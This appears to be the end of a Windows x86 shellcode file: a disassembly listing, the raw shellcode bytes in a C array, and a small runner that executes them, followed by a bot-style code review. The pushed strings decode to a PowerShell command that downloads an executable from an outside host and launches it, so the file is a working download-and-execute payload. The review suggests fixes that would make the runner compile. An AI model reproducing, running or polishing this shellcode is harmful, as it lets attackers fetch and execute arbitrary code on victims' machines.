0f8530010000 jne 0x17c + 0x4c: 8b34af mov esi, dword ptr [edi + ebp*4] + 0x4f: 01c6 add esi, eax + 0x51: 45 inc ebp + 0x52: 390e cmp dword ptr [esi], ecx + 0x54: 75f6 jne 0x4c + 0x56: 8b7a24 mov edi, dword ptr [edx + 0x24] + 0x59: 01c7 add edi, eax + 0x5b: 668b2c6f mov bp, word ptr [edi + ebp*2] + 0x5f: 8b7a1c mov edi, dword ptr [edx + 0x1c] + 0x62: 01c7 add edi, eax + 0x64: 8b7caffc mov edi, dword ptr [edi + ebp*4 - 4] + 0x68: 01c7 add edi, eax + 0x6a: 89d9 mov ecx, ebx + 0x6c: b1ff mov cl, 0xff + 0x6e: 53 push ebx + 0x6f: e2fd 
loop 0x6e + 0x71: 68293b7d22 push 0x227d3b29 + 0x76: 6865786527 push 0x27657865 + 0x7b: 687474792e push 0x2e797474 + 0x80: 6828277075 push 0x75702728 + 0x85: 6863757465 push 0x65747563 + 0x8a: 686c457865 push 0x6578456c + 0x8f: 685368656c push 0x6c656853 + 0x94: 686f6e292e push 0x2e296e6f + 0x99: 6863617469 push 0x69746163 + 0x9e: 6870706c69 push 0x696c7070 + 0xa3: 686c6c2e41 push 0x412e6c6c + 0xa8: 6820536865 push 0x65685320 + 0xad: 682d636f6d push 0x6d6f632d + 0xb2: 6865637420 push 0x20746365 + 0xb7: 682d4f626a push 0x6a624f2d + 0xbc: 68284e6577 push 0x77654e28 + 0xc1: 682729203b push 0x3b202927 + 0xc6: 682e657865 push 0x6578652e + 0xcb: 6875747479 push 0x79747475 + 0xd0: 682c202770 push 0x7027202c + 0xd5: 6865786527 push 0x27657865 + 0xda: 687474792e push 0x2e797474 + 0xdf: 68362f7075 push 0x75702f36 + 0xe4: 68742f7838 push 0x38782f74 + 0xe9: 6861746573 push 0x73657461 + 0xee: 6874792f6c push 0x6c2f7974 + 0xf3: 682f707574 push 0x7475702f + 0xf8: 687468616d push 0x6d616874 + 0xfd: 6873677461 push 0x61746773 + 0x102: 686c692f7e push 0x7e2f696c + 0x107: 687274682e push 0x2e687472 + 0x10c: 68652e6561 push 0x61652e65 + 0x111: 682f2f7468 push 0x68742f2f + 0x116: 687470733a push 0x3a737074 + 0x11b: 6828276874 push 0x74682728 + 0x120: 6846696c65 push 0x656c6946 + 0x125: 686c6f6164 push 0x64616f6c + 0x12a: 68446f776e push 0x6e776f44 + 0x12f: 686e74292e push 0x2e29746e + 0x134: 68436c6965 push 0x65696c43 + 0x139: 682e576562 push 0x6265572e + 0x13e: 68204e6574 push 0x74654e20 + 0x143: 686a656374 push 0x7463656a + 0x148: 68772d4f62 push 0x624f2d77 + 0x14d: 6820284e65 push 0x654e2820 + 0x152: 682226207b push 0x7b202622 + 0x157: 68616e6420 push 0x20646e61 + 0x15c: 68636f6d6d push 0x6d6d6f63 + 0x161: 686c6c202d push 0x2d206c6c + 0x166: 6872736865 push 0x65687372 + 0x16b: 68706f7765 push 0x65776f70 + 0x170: 89e2 mov edx, esp + 0x172: 41 inc ecx + 0x173: 51 push ecx + 0x174: 52 push edx + 0x175: ffd7 call edi + 0x177: e88dfeffff call 9 + 0x17c: 8b34af mov esi, dword ptr [edi + 
ebp*4] + 0x17f: 01c6 add esi, eax + 0x181: 45 inc ebp + 0x182: 813e45786974 cmp dword ptr [esi], 0x74697845 + 0x188: 75f2 jne 0x17c + 0x18a: 817e0450726f63 cmp dword ptr [esi + 4], 0x636f7250 + 0x191: 75e9 jne 0x17c + 0x193: 8b7a24 mov edi, dword ptr [edx + 0x24] + 0x196: 01c7 add edi, eax + 0x198: 668b2c6f mov bp, word ptr [edi + ebp*2] + 0x19c: 8b7a1c mov edi, dword ptr [edx + 0x1c] + 0x19f: 01c7 add edi, eax + 0x1a1: 8b7caffc mov edi, dword ptr [edi + ebp*4 - 4] + 0x1a5: 01c7 add edi, eax + 0x1a7: 31c9 xor ecx, ecx + 0x1a9: 51 push ecx + 0x1aa: ffd7 call edi +*/ + +#include + +char shellcode[]=\ + +"\x31\xc9\xb9\x57\x69\x6e\x45\xeb\x04\x31\xc9\xeb\x00\x31\xc0\x31\xdb\x31\xd2\x31\xff\x31\xf6\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x81\xf9\x57\x69\x6e\x45\x0f\x85\x30\x01\x00\x00\x8b\x34\xaf\x01\xc6\x45\x39\x0e\x75\xf6\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x29\x3b\x7d\x22\x68\x65\x78\x65\x27\x68\x74\x74\x79\x2e\x68\x28\x27\x70\x75\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x68\x6f\x6e\x29\x2e\x68\x63\x61\x74\x69\x68\x70\x70\x6c\x69\x68\x6c\x6c\x2e\x41\x68\x20\x53\x68\x65\x68\x2d\x63\x6f\x6d\x68\x65\x63\x74\x20\x68\x2d\x4f\x62\x6a\x68\x28\x4e\x65\x77\x68\x27\x29\x20\x3b\x68\x2e\x65\x78\x65\x68\x75\x74\x74\x79\x68\x2c\x20\x27\x70\x68\x65\x78\x65\x27\x68\x74\x74\x79\x2e\x68\x36\x2f\x70\x75\x68\x74\x2f\x78\x38\x68\x61\x74\x65\x73\x68\x74\x79\x2f\x6c\x68\x2f\x70\x75\x74\x68\x74\x68\x61\x6d\x68\x73\x67\x74\x61\x68\x6c\x69\x2f\x7e\x68\x72\x74\x68\x2e\x68\x65\x2e\x65\x61\x68\x2f\x2f\x74\x68\x68\x74\x70\x73\x3a\x68\x28\x27\x68\x74\x68\x46\x69\x6c\x65\x68\x6c\x6f\x61\x64\x68\x44\x6f\x77\x6e\x68\x6e\x74\x29\x2e\x68\x43\x6c\x69\x65\x68\x2e\x57\x65\x62\x68\x20\x4e\x65\x74\x68\x6a\x65\x63\x74\x68\x77\x2d\x4f\x62\x68\x20\x28\x4e\x65\x68\x22\x26\x20\x7b\x68\x61\x6e\x64\x
20\x68\x63\x6f\x6d\x6d\x68\x6c\x6c\x20\x2d\x68\x72\x73\x68\x65\x68\x70\x6f\x77\x65\x89\xe2\x41\x51\x52\xff\xd7\xe8\x8d\xfe\xff\xff\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x45\x78\x69\x74\x75\xf2\x81\x7e\x04\x50\x72\x6f\x63\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x31\xc9\x51\xff\xd7"; + +main(){(* (int(*)()) shellcode)();} \ No newline at end of file
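Review bot: `main(){(* (int(*)()) shellcode)();}` declares `main` without a return type, which relies on implicit int (removed in C99) and is rejected by current compilers; write it as `int main(void) { ((void (*)(void))shellcode)(); return 0; }`. The lone `#include` names no header in this rendering, and nothing in the file requires one, so the directive should either name a header or be removed. The string literal is broken across two lines of this rendering in the middle of the escape `\x20` (`...\x64\x` / `20\x68...`), which looks like a display artifact rather than the committed text but is worth confirming against the file. The header comment lists x64 hosts under "Tested on" while the disassembly uses 32-bit registers and `fs:[ebx + 0x30]`, so a sentence stating that this is 32-bit code would make the comment match the bytes.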